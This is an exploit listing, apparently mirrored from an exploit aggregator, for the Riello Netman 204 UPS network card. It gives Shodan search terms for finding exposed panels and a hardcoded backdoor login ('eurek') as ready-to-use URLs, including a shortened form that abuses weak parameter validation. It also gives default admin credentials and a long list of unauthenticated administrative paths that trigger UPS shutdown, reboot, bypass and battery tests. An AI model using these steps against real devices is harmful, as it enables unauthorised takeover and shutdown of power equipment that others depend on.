Exploit for Netman 204 Authentication Bypass / Remote Code Execution

Name: Exploit for Netman 204 Authentication Bypass / Remote Code Execution
Rating: 5 (51 reviews)
2025-04-11 | CVSS 7.8
## https://sploitus.com/exploit?id=PACKETSTORM:190441
# Exploit Title: Netman 204 - Remote command with out authentication
    # Date: 2/4/2025
    # Exploit Author: parsa rezaie khiabanloo
    # Vendor Homepage: netman-204 (https://www.riello-ups.com/downloads/25-netman-204)
    # Version: netman-204
    # Tested on: Windows/Linux
    
    Step 1 : Attacker can using these dorks then can find the UPS panel .
    
    Shodan :   http.favicon.hash:22913038  OR  https://www.shodan.io/search?query=netman+204+cgi-bin
    
    # We Found Two panel  Yellow and blue 
    
    Step 2 : For Yellow panel attacker can use these username and password because there have backdoor and for Blue panel we can use the Remote commands  and burpsuite repeater to see the details of the ups .
    
    Yellow Panel : username and password : eurek
    
    Some exploits for that :
    
    http://[IP]/cgi-bin/login.cgi?username=eurek&password=eurek
    or
    https://[IP]/cgi-bin/login.cgi?username=eurek&password=eurek
    
    Due to flaws in parameter validation, the URL can be shortened to:
    
    http://[IP]/cgi-bin/login.cgi?username=eurek%20eurek
    or
    https://[IP]/cgi-bin/login.cgi?username=eurek%20eurek
    
    
    Blue Panel : username and password : admin
    
    Some Critical leaks without authentication we can see : 
    
    http://IP/administration-commands.html
    http://IP/administration.html
    http://IP/administration.html#
    http://IP/administration.html#LDAP
    http://IP/administration.html#active-users
    http://IP/administration.html#firmware-upgrade
    http://IP/configuration.html
    http://IP/history.html
    http://IP/index.html
    http://IP/login.html
    http://IP/system-overview.html
    http://IP/table.html
    
    #With using up paths we can see the details of the UPS without authentication .
    
    First open burpsuite and intercept the requests then use the up paths and after that send that request to the repeater then send it again and in your response open the render and enjoy :) 
    
    Some Remote commands without authentication : 
    
    http://IP/administration-commands.html
    http://IP/administration-commands.html#
    http://IP/administration-commands.html#reboot-irms
    http://IP/administration-commands.html#reboot-mdu
    http://IP/administration-commands.html#reboot-xts
    http://IP/administration-commands.html#shutdown
    http://IP/administration-commands.html#shutdown-irms
    http://IP/administration-commands.html#shutdown-mdu
    http://IP/administration-commands.html#shutdown-restore
    http://IP/administration-commands.html#shutdown-restore-irms
    http://IP/administration-commands.html#shutdown-restore-mdu
    http://IP/administration-commands.html#shutdown-restore-xts
    http://IP/administration-commands.html#shutdown-xts
    http://IP/administration-commands.html#shutdownrestore
    http://IP/administration-commands.html#switch-irms
    http://IP/administration-commands.html#switch-on-bypass
    http://IP/administration-commands.html#test-battery